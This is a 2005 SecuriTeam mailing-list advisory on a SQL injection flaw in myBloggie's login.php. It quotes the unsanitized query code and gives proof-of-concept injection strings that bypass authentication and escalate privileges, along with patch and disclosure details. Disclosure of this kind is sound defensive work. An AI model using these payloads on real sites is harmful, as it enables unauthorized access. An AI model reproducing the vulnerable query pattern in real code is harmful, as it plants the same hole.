From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 27 Sep 2005 15:43:04 +0200
Subject: [UNIX] myBloggie SQL Injection/Privilege Escalation
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20050927151143.1D5DB581A@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
myBloggie SQL Injection/Privilege Escalation
------------------------------------------------------------------------
SUMMARY
<http://mybloggie.mywebland.com/>; myBloggie is "a Weblog system built
using PHP and mySQL".
myBloggie vulnerable to SQL injection vulnerability caused by improper
validation of user-supplied inputs. This vulnerability can be exploited to
bypass authentication mechanism, escalate the privileges to administrator
level and also made to reveal system specific information.
DETAILS
Vulnerable Systems:
* myBloggie versions 2.1.3-beta and prior
User supplied credential inputs ('$username' and '$passwd') are not
sanitized in login.php before subjecting them to SQL query.
Vulnerable code:
<----------------------------login.php
snippet--------------------------------->
if (isset($_POST['username'])) {
$username=$_POST['username'];
} else $username="";
$result = mysql_query( "SELECT user FROM ".USER_TBL." WHERE
user='$username'
AND password='$passwd'" ) or error( mysql_error() );
<--------------------------------------------------------------------------->
This can be exploited in multiple ways,
1. Authentication Bypass: A malicious user can log on to the weblog system
without submitting the password by placing queries such as this "admin' OR
'x'='x" in the User Name field.
2. Privilege Escalation: When a non-administrative user submits, for
example "user1' OR 'x'='x", into the User Name field, administrative
privileges will be granted.
3. Path Disclosure: Path information can be made to disclose in error
pages by passing invalid query to User Name field of login.php.
Proof of Concept:
POST http://example.com/mybloggie/login.php?username=admin' OR 'x'='x
POST http://example.com/mybloggie/login.php?username=normal_user' OR
'one'='one
POST http://example.com/mybloggie/login.php?username='1=1 --
Patch Availability:
Patch: <http://mywebland.com/forums/showtopic.php?t=399>;
http://mywebland.com/forums/showtopic.php?t=399
Disclosure Timeline:
* 01.09.05 - Issue Discovered
* 02.09.05 - Reported to the vendor
* 03.09.05 - Patch Released
* 05.09.05 - Advisory Released
ADDITIONAL INFORMATION
The information has been provided by <mailto:os2a.bto@gmail.com.>
os2a.bto.
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
